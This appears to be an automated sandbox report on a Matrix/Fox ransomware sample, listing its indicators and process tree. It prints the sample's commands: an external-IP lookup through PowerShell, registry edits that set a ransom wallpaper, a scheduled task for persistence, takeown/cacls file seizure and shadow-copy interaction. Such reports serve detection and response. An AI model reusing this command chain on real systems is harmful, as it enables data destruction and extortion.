description ioc Process File opened (read-only) \??\V: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\U: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\E: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\B: fjPLyeD864.exe File opened (read-only) \??\E: fjPLyeD864.exe File opened (read-only) \??\G: fjPLyeD864.exe File opened (read-only) \??\N: fjPLyeD864.exe File opened (read-only) \??\Z: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\Y: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\R: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\M: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\I: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\J: fjPLyeD864.exe File opened (read-only) \??\Y: fjPLyeD864.exe File opened (read-only) \??\N: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\G: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\U: fjPLyeD864.exe File opened (read-only) \??\X: fjPLyeD864.exe File opened (read-only) \??\W: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\K: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\H: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\H: fjPLyeD864.exe File opened (read-only) \??\L: fjPLyeD864.exe File opened (read-only) \??\O: fjPLyeD864.exe File opened (read-only) \??\P: fjPLyeD864.exe File opened (read-only) \??\J: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\S: fjPLyeD864.exe File opened (read-only) \??\X: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\O: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\I: fjPLyeD864.exe File opened (read-only) \??\R: fjPLyeD864.exe File opened (read-only) \??\S: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\P: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\L: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\T: fjPLyeD864.exe File opened (read-only) \??\W: fjPLyeD864.exe File opened (read-only) \??\Z: fjPLyeD864.exe File opened (read-only) \??\T: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\Q: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\A: fjPLyeD864.exe File opened (read-only) \??\K: fjPLyeD864.exe File opened (read-only) \??\M: fjPLyeD864.exe File opened (read-only) \??\Q: fjPLyeD864.exe File opened (read-only) \??\V: fjPLyeD864.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 158 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\7mnQbxzr.bmp" DllHost.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\cryptix.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\DebugRegister.ttf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngom.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Advertising 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\CompatExceptions.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunpkcs11.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\unicode.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ar.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\vi.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\release 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\libpng.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\plugin.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jcup.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\msedge_7z.data 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\ExpandRegister.MTS 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\webkit.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\orbd.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\zh-TW.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\include\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\te.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.181.5\MicrosoftEdgeUpdateOnDemand.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Advertising.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\access-bridge-64.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ko.properties 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\cacerts 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\en-US.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\splash.gif 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\management\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\hi.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Other.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5844 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1304 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 6196 fjPLyeD864.exe 6196 fjPLyeD864.exe 6196 fjPLyeD864.exe 6196 fjPLyeD864.exe 6196 fjPLyeD864.exe 6196 fjPLyeD864.exe 6196 fjPLyeD864.exe 6196 fjPLyeD864.exe 6196 fjPLyeD864.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 6196 fjPLyeD864.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3132 powershell.exe Token: SeTakeOwnershipPrivilege 660 takeown.exe Token: SeDebugPrivilege 6196 fjPLyeD864.exe Token: SeLoadDriverPrivilege 6196 fjPLyeD864.exe Token: SeTakeOwnershipPrivilege 3460 takeown.exe Token: SeTakeOwnershipPrivilege 7128 takeown.exe Token: SeTakeOwnershipPrivilege 2908 takeown.exe Token: SeTakeOwnershipPrivilege 7136 takeown.exe Token: SeTakeOwnershipPrivilege 5324 takeown.exe Token: SeBackupPrivilege 6340 vssvc.exe Token: SeRestorePrivilege 6340 vssvc.exe Token: SeAuditPrivilege 6340 vssvc.exe Token: SeTakeOwnershipPrivilege 5256 cacls.exe Token: SeIncreaseQuotaPrivilege 4584 WMIC.exe Token: SeSecurityPrivilege 4584 WMIC.exe Token: SeTakeOwnershipPrivilege 4584 WMIC.exe Token: SeLoadDriverPrivilege 4584 WMIC.exe Token: SeSystemProfilePrivilege 4584 WMIC.exe Token: SeSystemtimePrivilege 4584 WMIC.exe Token: SeProfSingleProcessPrivilege 4584 WMIC.exe Token: SeIncBasePriorityPrivilege 4584 WMIC.exe Token: SeCreatePagefilePrivilege 4584 WMIC.exe Token: SeBackupPrivilege 4584 WMIC.exe Token: SeRestorePrivilege 4584 WMIC.exe Token: SeShutdownPrivilege 4584 WMIC.exe Token: SeDebugPrivilege 4584 WMIC.exe Token: SeSystemEnvironmentPrivilege 4584 WMIC.exe Token: SeRemoteShutdownPrivilege 4584 WMIC.exe Token: SeUndockPrivilege 4584 WMIC.exe Token: SeManageVolumePrivilege 4584 WMIC.exe Token: 33 4584 WMIC.exe Token: 34 4584 WMIC.exe Token: 35 4584 WMIC.exe Token: 36 4584 WMIC.exe Token: SeTakeOwnershipPrivilege 7568 cmd.exe Token: SeIncreaseQuotaPrivilege 4584 WMIC.exe Token: SeSecurityPrivilege 4584 WMIC.exe Token: SeTakeOwnershipPrivilege 4584 WMIC.exe Token: SeLoadDriverPrivilege 4584 WMIC.exe Token: SeSystemProfilePrivilege 4584 WMIC.exe Token: SeSystemtimePrivilege 4584 WMIC.exe Token: SeProfSingleProcessPrivilege 4584 WMIC.exe Token: SeIncBasePriorityPrivilege 4584 WMIC.exe Token: SeCreatePagefilePrivilege 4584 WMIC.exe Token: SeBackupPrivilege 4584 WMIC.exe Token: SeRestorePrivilege 4584 WMIC.exe Token: SeShutdownPrivilege 4584 WMIC.exe Token: SeDebugPrivilege 4584 WMIC.exe Token: SeSystemEnvironmentPrivilege 4584 WMIC.exe Token: SeRemoteShutdownPrivilege 4584 WMIC.exe Token: SeUndockPrivilege 4584 WMIC.exe Token: SeManageVolumePrivilege 4584 WMIC.exe Token: 33 4584 WMIC.exe Token: 34 4584 WMIC.exe Token: 35 4584 WMIC.exe Token: 36 4584 WMIC.exe Token: SeTakeOwnershipPrivilege 6856 takeown.exe Token: SeTakeOwnershipPrivilege 8096 takeown.exe Token: SeTakeOwnershipPrivilege 6768 takeown.exe Token: SeTakeOwnershipPrivilege 7644 cmd.exe Token: SeTakeOwnershipPrivilege 6164 cmd.exe Token: SeTakeOwnershipPrivilege 8100 takeown.exe Token: SeTakeOwnershipPrivilege 7812 takeown.exe Token: SeTakeOwnershipPrivilege 8068 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5040 wrote to memory of 1560 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 85 PID 5040 wrote to memory of 1560 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 85 PID 5040 wrote to memory of 1560 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 85 PID 5040 wrote to memory of 2968 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 87 PID 5040 wrote to memory of 2968 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 87 PID 5040 wrote to memory of 2968 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 87 PID 5040 wrote to memory of 1300 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 92 PID 5040 wrote to memory of 1300 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 92 PID 5040 wrote to memory of 1300 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 92 PID 1300 wrote to memory of 3132 1300 cmd.exe 94 PID 1300 wrote to memory of 3132 1300 cmd.exe 94 PID 1300 wrote to memory of 3132 1300 cmd.exe 94 PID 5040 wrote to memory of 3532 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 99 PID 5040 wrote to memory of 3532 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 99 PID 5040 wrote to memory of 3532 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 99 PID 5040 wrote to memory of 1516 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 100 PID 5040 wrote to memory of 1516 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 100 PID 5040 wrote to memory of 1516 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 100 PID 3532 wrote to memory of 4236 3532 cmd.exe 109 PID 3532 wrote to memory of 4236 3532 cmd.exe 109 PID 3532 wrote to memory of 4236 3532 cmd.exe 109 PID 1516 wrote to memory of 3020 1516 cmd.exe 104 PID 1516 wrote to memory of 3020 1516 cmd.exe 104 PID 1516 wrote to memory of 3020 1516 cmd.exe 104 PID 5040 wrote to memory of 2536 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 105 PID 5040 wrote to memory of 2536 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 105 PID 5040 wrote to memory of 2536 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 105 PID 3532 wrote to memory of 3288 3532 cmd.exe 107 PID 3532 wrote to memory of 3288 3532 cmd.exe 107 PID 3532 wrote to memory of 3288 3532 cmd.exe 107 PID 3532 wrote to memory of 392 3532 cmd.exe 108 PID 3532 wrote to memory of 392 3532 cmd.exe 108 PID 3532 wrote to memory of 392 3532 cmd.exe 108 PID 2536 wrote to memory of 3728 2536 cmd.exe 110 PID 2536 wrote to memory of 3728 2536 cmd.exe 110 PID 2536 wrote to memory of 3728 2536 cmd.exe 110 PID 2536 wrote to memory of 660 2536 cmd.exe 111 PID 2536 wrote to memory of 660 2536 cmd.exe 111 PID 2536 wrote to memory of 660 2536 cmd.exe 111 PID 2536 wrote to memory of 7968 2536 cmd.exe 113 PID 2536 wrote to memory of 7968 2536 cmd.exe 113 PID 2536 wrote to memory of 7968 2536 cmd.exe 113 PID 7968 wrote to memory of 8000 7968 cmd.exe 112 PID 7968 wrote to memory of 8000 7968 cmd.exe 112 PID 7968 wrote to memory of 8000 7968 cmd.exe 112 PID 8000 wrote to memory of 6196 8000 fjPLyeD8.exe 114 PID 8000 wrote to memory of 6196 8000 fjPLyeD8.exe 114 PID 5040 wrote to memory of 6548 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 115 PID 5040 wrote to memory of 6548 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 115 PID 5040 wrote to memory of 6548 5040 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 115 PID 6548 wrote to memory of 5996 6548 cmd.exe 117 PID 6548 wrote to memory of 5996 6548 cmd.exe 117 PID 6548 wrote to memory of 5996 6548 cmd.exe 117 PID 6548 wrote to memory of 896 6548 cmd.exe 118 PID 6548 wrote to memory of 896 6548 cmd.exe 118 PID 6548 wrote to memory of 896 6548 cmd.exe 118 PID 6548 wrote to memory of 6588 6548 cmd.exe 119 PID 6548 wrote to memory of 6588 6548 cmd.exe 119 PID 6548 wrote to memory of 6588 6548 cmd.exe 119 PID 6588 wrote to memory of 6776 6588 cmd.exe 120 PID 6588 wrote to memory of 6776 6588 cmd.exe 120 PID 6588 wrote to memory of 6776 6588 cmd.exe 120 PID 6548 wrote to memory of 6704 6548 cmd.exe 121 PID 6548 wrote to memory of 6704 6548 cmd.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW76nE8i.exe"2⤵PID:1560
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW76nE8i.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW76nE8i.exe" -n2⤵
- Executes dropped EXE
PID:2968
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3TnjE0Fu.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7mnQbxzr.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7mnQbxzr.bmp" /f3⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:3288
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:392
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CxstsUWG.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CxstsUWG.vbs"3⤵
- Checks computer location settings
PID:3020 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\nFhwKFc9.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:6852
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\nFhwKFc9.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:5844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:7664
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:5820
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:3728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:7968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""2⤵
- Suspicious use of WriteProcessMemory
PID:6548 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C3⤵PID:5996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"3⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "ActivitiesCache.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:6588 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "ActivitiesCache.db" -nobanner4⤵
- Executes dropped EXE
